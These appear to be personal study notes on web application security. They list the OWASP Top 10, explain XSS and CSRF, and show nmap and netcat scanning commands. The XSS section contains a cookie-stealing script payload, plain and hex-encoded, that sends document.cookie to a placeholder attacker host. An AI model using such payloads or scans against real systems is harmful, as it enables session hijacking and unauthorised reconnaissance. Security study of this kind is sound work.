## Web Application Security
- OWASP() good source of info on web app security
    - 10 vulnerability list
        Injection
        Broken Authentication
        Sensitive data exposure
        XML External Entities (XXE)
        Broken Access control
        Security misconfigurations
        Cross Site Scripting (XSS)
        Insecure Deserialization
        Using Components with known vulnerabilities
        Insufficient logging and monitoring
- vulnerability
    - a hole or weakness in application, which can be a design flaw or an implementation bug that allows attacker to cause harm

- threat agent
    - individual or a group that can manifest a threat. 
    - a specific threat, r specific type of virus, worm or other malware
- how XSS work?
     attacker can create a malicious link to inject unwanted executable JavaScript into a Web site. The most usual case of this vulnerabilities occurs when GET variables are printed or echoed without filtering or checking their content.

    clicking the link victim's cookie can be sent to server or it can modify affected site, injecting form to steal username & password and other phishing technique

    example link:

        http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

    it can be done with hex: 

        http://VulnerableHost/a.php?variable=%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%41%74%74%61%63%6B%65%72%73%48%6F%73%74%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E


- how CSRF work?
    Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

    https://stackoverflow.com/questions/5207160/what-is-a-csrf-token-what-is-its-importance-and-how-does-it-work

    https://medium.com/@charithra/introduction-to-csrf-a329badfca49
    
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)


Get details info of a server with tools?
    - nmap
        ```
            nmap -A -T4 ipAddress
            nmap -sV -O ipAddress
        ```
    - netat
        - reads and writes data across network communication using tcp or udp protocol. 
        - can be used to: debug & monitor network communications, scan for open ports, transfer data, as a proxy & more

        ```
        nc [option] host port
        nc -u host port  # for udp
        nc -z -v 10.10.8.8 20-80 #port scan
        nc -z -v 10.10.8.8 20-80 2>&1 | grep succeeded #open port scan
        ```
    - firebug
        In addition to debugging web pages, Firebug was used for web security testing[9] and web page performance analysis.[10]

        